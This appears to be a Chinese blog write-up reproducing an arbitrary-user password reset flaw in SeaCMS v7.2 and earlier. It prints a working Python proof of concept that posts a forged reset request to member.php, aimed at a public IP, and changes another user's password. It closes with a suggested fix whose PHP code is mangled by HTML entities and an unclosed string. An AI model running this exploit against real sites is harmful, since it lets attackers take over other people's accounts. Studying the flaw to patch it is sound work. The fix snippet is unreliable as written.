seacms<=v7.2任意用户密码重置漏洞复现

0x01描述


海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,被众多视频内容站长青睐的建站系统。

0x02漏洞复现

目标系统版本:

我们分别注册两个用户:user:aaaaaa pass:aaaaaa

user:bbbbbb pass:bbbbbb

漏洞poc:

import requests
session = requests.Session()
paramsGet = {“mod”:”repsw4″}
paramsPost = {“cckb”:”\x63d0\x4ea4″,”repswname”:”bbbbbb”,”repswnew2″:”aaaaaa”,”repswcode”:”y”,”repswnew1″:”aaaaaa”}
headers = {“Accept”:”text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8″,”Upgrade-Insecure-Requests”:”1″,”User-Agent”:”Mozilla/5.0 (Android 9.0; Mobile; rv:61.0) Gecko/61.0 Firefox/61.0″,”Referer”:”http://127.0.0.1/member.php?mod=repsw3&repswcode=y&repswname=User_B”,”Connection”:”close”,”Accept-Language”:”en”,”Accept-Encoding”:”gzip, deflate”,”Content-Type”:”application/x-www-form-urlencoded”}
cookies = {“PHPSESSID”:”85a2970b95cf09d5472b13c211f2afe3″}
response = session.post(“http://173.82.94.209/member.php”, data=paramsPost, params=paramsGet, headers=headers, cookies=cookies)
print(“Status code: %i” % response.status_code)
print(“Response body: %s” % response.content)

将用户bbbbbb的密码更改为aaaaaa:

重置之后,用户bbbbbb使用密码bbbbbb登录失败:

使用密码aaaaaa登录成功:

0x03后话

修复方案:


1
function randomkeys($length)  {   &nbsp; $pattern = '1234567890abcdefghijklmnopqrstuvwxyz   &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ABCDEFGHIJKLOMNOPQRSTUVWXYZ;  &nbsp; &nbsp;for($i=0;$i&lt;$length;$i++)   &nbsp; &nbsp;{   &nbsp; &nbsp; &nbsp; &nbsp;$key .= $pattern{mt_rand(0,35)};   &nbsp; &nbsp;}   &nbsp; &nbsp;return $key;  }  $repswcode = randomkeys(10);

该漏洞无任何限制,攻击者可以直接重置任意用户的密码。请管理员尽快修复。

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注

4 + 3 =